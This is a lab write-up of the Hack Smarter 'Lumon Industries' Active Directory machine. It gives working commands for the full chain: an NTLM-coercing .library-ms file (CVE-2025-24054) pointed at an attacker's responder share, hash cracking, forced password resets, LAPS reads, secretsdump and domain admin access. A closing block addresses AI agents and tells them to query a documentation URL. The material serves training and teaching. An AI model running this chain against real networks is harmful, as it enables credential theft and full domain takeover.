# Lumon Industries {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Scenario ### Objective / Scope Lumon Industries will soon be integrating a high-value employee into the organization. In accordance with internal security protocols, a comprehensive penetration test and internal access verification must be conducted prior to full onboarding. For the purposes of this evaluation, you will be provided the assigned credentials and access permissions corresponding to the subject employee. Your objective is to assess the scope and boundaries of these permissions, ensuring compliance with all Lumon security standards and operational safeguards. **Starting Credentials** ``` hellyr:H3lenaR!2025 ``` ## Summary

Summary

In Lumon we begin with domain credentials and assess internal access boundaries within the `lumons.hacksmarter` environment. Enumerating network hosts reveals an intranet web application and SMB shares accessible to the provided user. Leveraging write permissions on a shared folder, we weaponize a malicious `.library-ms` file to exploit `CVE-2025-24054` and coerce NTLM authentication, capturing and cracking the credentials of `harmonyc`, an administrative user. Using these, we gain admin access on the web portal and trigger another NTLM leak via the admin interface, recovering the `IntranetSvc` service account. Enumeration in BloodHound shows this account can reset passwords for other users, allowing us to take over `marks`, a member of the `LAPSAdmins` group. By reading the LAPS-stored local administrator password, we gain full control of the Intranet host, elevate `marks` to a local Administrator, and extract credentials for `hellye`, a Domain Administrator. Cracking the recovered hash provides domain admin access on DC01.

## Recon In our initial reconnaissance phase, we perform a port scan on every available machine and manually probe the services available. ### DC01 We use rustscan `-b 500 -a 10.1.194.227 -- -sC -sV -Pn` to enumerate all TCP ports on the `DC01` machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`. A batch size of `500` trades speed for stability, the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability. ``` rustscan -b 500 -a 10.1.194.227 -- -sC -sV -Pn ```

DC01 is the domain controller with exposed services including DNS `53`, Kerberos `88/464`, multiple MSRPC endpoints `135, 593, 49664+`, SMB `139/445`, LDAP and LDAPS `389/636/3268/3269` tied to Active Directory, RDP `3389`, and .NET Remoting `9389`. This indicates a fully integrated Windows AD environment where LDAP/LDAPS and Kerberos provide authentication, SMB and RPC enable remote management, and RDP/WinRM serve as remote access points.

#### SMB Before we dive in with the provided credentials we try to authenticate as `guest` and anonymously against SMB, but without success. Nevertheless we generate the hosts file entry like the following: ``` nxc smb 10.1.194.227 -u '' -p '' --generate-hosts-file hosts-DC ```

We add the following to our `/etc/hosts` file. We could also directly append the entry to our hosts file by providing the path to `/etc/hosts` in the NetExec command. ``` 10.1.194.227 DC01.lumons.hacksmarter lumons.hacksmarter DC01 ``` We are able to authenticate as `hellyr` with the provided password against the DC, but we do not find any interesting shares. ``` nxc smb DC01 -u 'hellyr' -p 'H3lenaR!2025' --shares ```

#### BloodHound With the credentials, we then enumerate the AD using BloodHound. {% code overflow="wrap" %} ``` bloodhound-ce.py --zip -c All -d lumons.hacksmarter -u 'hellyr' -p 'H3lenaR!2025' -dc DC01.lumons.hacksmarter -ns 10.1.194.227 ``` {% endcode %}

We see that the user has no special permissions, but is in the `MICRODATA REFINEMENT` group.

We are able to identify `hellye` as one of the Domain Admins. For now, we will continue with the `Intranet` machine.

### Intranet We use rustscan `-b 500 -a 10.1.212.200` `-- -sC -sV -Pn` to enumerate all TCP ports on the `Intranet` machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`. A batch size of `500` trades speed for stability, the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability. ``` rustscan -b 500 -a 10.1.212.200 -- -sC -sV -Pn ```

The `Intranet` machine has a web server available on port `80` in addition to SMB, RDP, and the RPC ports as well as `5985` with Windows Remote Management. From this initial scan we can determine the acutal machine name and domain.

#### SMB Here, too, we first try too authenticate as `guest` and anonymously against SMB, but without success. Nevertheless we generate the hosts file entry like the following: ``` nxc smb 10.1.212.200 -u '' -p '' --generate-hosts-file hosts-Intranet ```

We add the following to our `/etc/hosts` file. ``` 10.1.212.200 INTRANET.lumons.hacksmarter INTRANET ``` We enumerate the shares on `Intranet` as `hellyr` and are able to identify the `MDRepo` share where we have `read` and `write` access to. ``` nxc smb INTRANET -u 'hellyr' -p 'H3lenaR!2025' --shares ```

We connect to the share using `smbclient.py` and find a `.url` and `.pdf` file. We download those files but do not find a lead in there.

Hint

Since we have write access to that share we could try to steal the NTLM hash of the users who regularly accesses the share. But more on that later. We move on to the web service.

``` smbclient.py hellyr@INTRANET ```

#### WEB We visit the site on port `80` and get redirected to the HTTPS service on port `443`.

We try to log in as `hellyr` with the provided credentials.

We are able to log in, but do not find anything useful yet.

Next, we perform a directory scan using Feroxbuster and find a `terminal` and `admin` page, but we do not have access here as `hellyr`. {% code overflow="wrap" %} ``` feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u https://INTRANET.lumons.hacksmarter/ -k ``` {% endcode %}

## Access as harmonyc We recall out finding on the SMB shares, that we have write access to `MDRepo` and the idea to steal the hashes of users accessing the share.

The Greenwolf `ntlm_theft` tool may help us out here. With that we are able to create up to 21 files that can be used for NTLM hash theft. {% embed url="" %} We generate the files... ``` ntlm_theft.py --generate modern --server 10.200.29.81 --filename "Lumons Intranet" ```

... spin up responder... {% embed url="" %} ``` responder -I tun0 ```

... and put those files in the share but we do not receive any hashes. Recalling a recent CVE - CVE-2025-24054 - a Windows vulnerability that allows to leak NTLM hashes by tricking users into interacting with a `.library-ms` file. Windows automatically attempts NTLM authentication when accessing remote resources, often without clear user warning. This implicit trust in network locations allows to coerce the system into sending credential material. {% embed url="" %} With a malicious `.library-ms` file depicted in the following resource it points to a remote SMB/WebDAV share under our control - in this case responder. The vulnerability could be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. Windows initiates an NTLM authentication request to that remote server, leaking the user's NTLM hash, which can then be relayed or cracked. We use the following resource to generate the `.library-ms` file: {% embed url="" %} ``` python exploit.py ```

``` \\10.200.29.81\share ``` We place the file into the share using `smbclient.py`. ``` smbclient.py hellyr@INTRANET ``` ``` use MDRepo ```

``` put CVE-2025-24054_CVE-2025-24071-PoC/xd.library-ms ```

After a short duration we receive the NTLMv2-SSP of `harmonyc`. The manager mentioned in the pdf.

We try to crack the hash and are successful. ``` hashcat -m 5600 harmonyc.NTLMv2-SSP /usr/share/wordlists/rockyou.txt ```

We authenticate as `harmonyc` on the domain controller and are successfull. ``` nxc smb DC01 -u 'harmonyc' -p 'REDACTED' --shares ```

We mark the user as owned in BloodHound. We see that the user is part of the custom group `ADMINISTRATION`.

## Access as IntranetSvc We try to log in as `harmonyc` on the Intranet portal.

We are successful and have now the admin and terminal page accessible.

Next, we visit the admin page and have three options available. We are able to unlock other AD Accounts, ping servers and browse file shares. ``` https://intranet.lumons.hacksmarter/admin ```

While responder still running we provide our share like the following: ``` \\10.200.29.81\share ```

And we immediately get the hash of IntranetSvc.

We try to crack it, and are successfull. ``` hashcat -m 5600 IntranetSvc.NTLMv2-SSP /usr/share/wordlists/rockyou.txt ```

We test the credentials using NetExec and are able to authenticate against SMB on DC01. ``` nxc smb DC01 -u 'IntranetSvc' -p 'REDACTED' --shares ```

## Shell as marks We mark the user `IntranetSvc` as owned in Bloodhound. The user `IntranetSvs` is member of the `Web Admins` group.

Besides Intranet also `peterk` is member of the web admins group.

We do have permissions to change the password of the user. {% hint style="info" %} One thing I didn't notice here is that the user is disabled, which could have been already identified in the BloodHound data, see the screenshot below. This part can be skipped to marks, as the user has the same permissions, is not disabled, and we can change the password of that user too. {% endhint %}

This is interesting because `peterk` is also member of `LAPSAdmins` which could mean that the user can read the attribute that stores the local admin password.

We use bloodyad to change the password and try to authenticate against SMB but get a timeout like depcited in `thehacker.recipes`. {% embed url="" %} {% code overflow="wrap" %} ``` bloodyad -u 'IntranetSvc' -p 'REDACTED' --host DC01.lumons.hacksmarter set password 'PETERK' 'Pwned123@!' ``` {% endcode %} ``` nxc smb INTRANET -u 'peterk' -p 'Pwned123@! ```

With authenticating against LDAP we see why - the account is disabled. If we would have paid a bit more attention to our BloodHound data we would have saved a bit time. ``` nxc ldap DC01.lumons.hacksmarter -u 'peterk' -p 'Pwned123@! ```

We investigate the outbound object control of `IntranetSvc`, and see that we also could change the passwords of other users. One of them is `marks`.

That user is also member if the `LAPSAdmin` group and is not disabled.

We change the passsword of marks... {% code overflow="wrap" %} ``` bloodyad -u 'IntranetSvc' -p 'REDACTED' --host DC01.lumons.hacksmarter set password 'marks' 'Pwned123@!' ``` {% endcode %}

... and try to log in using evil-winrm and are able to connect. We find the user flag at `C:\Users\MarkS\Desktop\user.txt`. ``` evil-winrm -i INTRANET -u 'marks' -p 'Pwned123@!' ```

## Access as localadmin on INTRANET Since the account is not disabled and this user is part of `LAPSAdmins`, we can then try to read the LAPS password of the computer account i.e. the password of the computer's local administrator: {% embed url="" %} We use NetExec for our attempt and are able to read the `localadmin`'s password of the `Intranet` machine. ``` nxc ldap DC01.lumons.hacksmarter -u 'marks' -p 'Pwned123@!' --module laps ```

We test whether we can authenticate to SMB on `Intranet` using the discovered credentials, and the authentication is successful. ``` nxc smb INTRANET -u 'localadmin' -p 'REDACTED' --local-auth ```

## Shell as marks (added to Domain Admins) As low-hanging fruit, we try to dump SAM and LSA secrets on `Intranet`. This may allow us to find additional credentials. After all, we have access as `localadmin`. Unfortunately, we are unable to authenticate ourselves cleanly as localadmin using secretsdump.py. NetExec modules such as `nanodump` or `lsassy` did not work, or tags such as `--lsa` and `--sam` also do not work (they at least require Domain Admin or Local Admin Priviledges on target Domain Controller). We are also able to get a Remote Desktop session as `localadmin`. As `localadmin`, we can now try to extend a domain user we control with local adminstration permissions by adding that user to Administrators in order to remotely use `secretsdump.py` to dump the SAM & LSA secrets on `Intranet`. We open a CMD terminal as administrator and issue the following command to add `marks` to the local Administrators group. ``` net localgroup Administrators marks /add ```

If we now authenticate as marks on INTRANET via SMB using NetExec, we see we are now admin. ``` nxc smb INTRANET -u 'marks' -p 'Pwned123@!' ```

Next, we use `secretsdump.py` to dump the hashes and find the hash of `hellye`. {% embed url="" %} ``` secretsdump.py 'lumons.hacksmarter/marks:Pwned123@!@INTRANET' ```

Recalling our BloodHound enumeration we know that `hellye` is a Domain Administrator.

As a low-hanging fruit, we try to crack the DCC2 hash. This takes a little more time but is successful with `rockyou.txt`. ``` hashcat -m 2100 hellye.DCC2 /usr/share/wordlists/rockyou.tx ```

We are now able to authenticate as `hellye` on DC01 as a Domain Administraor. ``` nxc smb DC01.lumons.hacksmarter -u 'hellye' -p 'REDACTED' ```

From there we are able to retrieve the final flag using `smbclient.py`... ``` smbclient.py hellye@DC01 ```

... and connect to the domain controlller using RDP as the Domain Admin.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/hack-smarter-labs/2026/lumon-industries.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.